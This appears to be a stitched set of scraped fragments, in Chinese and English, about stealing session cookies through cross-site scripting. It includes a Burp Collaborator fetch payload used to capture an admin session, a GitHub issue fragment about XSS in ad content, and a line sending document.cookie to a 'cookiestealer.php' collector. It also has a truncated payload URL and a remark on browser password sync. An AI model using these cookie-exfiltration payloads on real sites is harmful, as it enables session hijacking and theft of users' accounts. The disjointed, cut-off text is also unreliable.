fetch里面的URL内容是Burp Collaborator Client出来的payload 之后打开Burp Collaborator Client,可以发现有个HTTP报文 点开它,里面是管理员的session 之后使用这个cookie去覆盖home页面的cookie就可以解决战斗了
Then fill in the payload " "in the ad content. Open the tab Invocation and copy the invocation link, Access link,Causes XSS to steal sensitive information of logged-in users weng-xianhuclosed this ascompletedMar 22, 2024
The JavaScript string we'll use to pass cookies to a server where we can write them to will once again utilize the document.cookie parameter, however, it will be instead passed inline with a URL as defined in document.location. document.location='http://127.0.0.1/cookiestealer.php?c='+...
Payload response.json()).then(data => console.log(data)).catch(error => console.error('Error:', error));"> Payload integrated URL (cookie is stolen through a xss vulnerable site) https://www.yoursite.com/search?term= response.json()).then(data => console.log(data)).catch(error...
而且现代浏览器大多有一个机制:云同步,除了书签、个人偏好外,还可以同步浏览器记住的密码,使得用户在任意地方都可以同步自己的“习惯”。有的身份认证Cookie是绑定IP的,这样的话同步Cookie就不好使了。简而言之吧,密码这东西就是方便,可也太滥用了,滥用有风险,而且还来了个云同步,黑客兴奋了。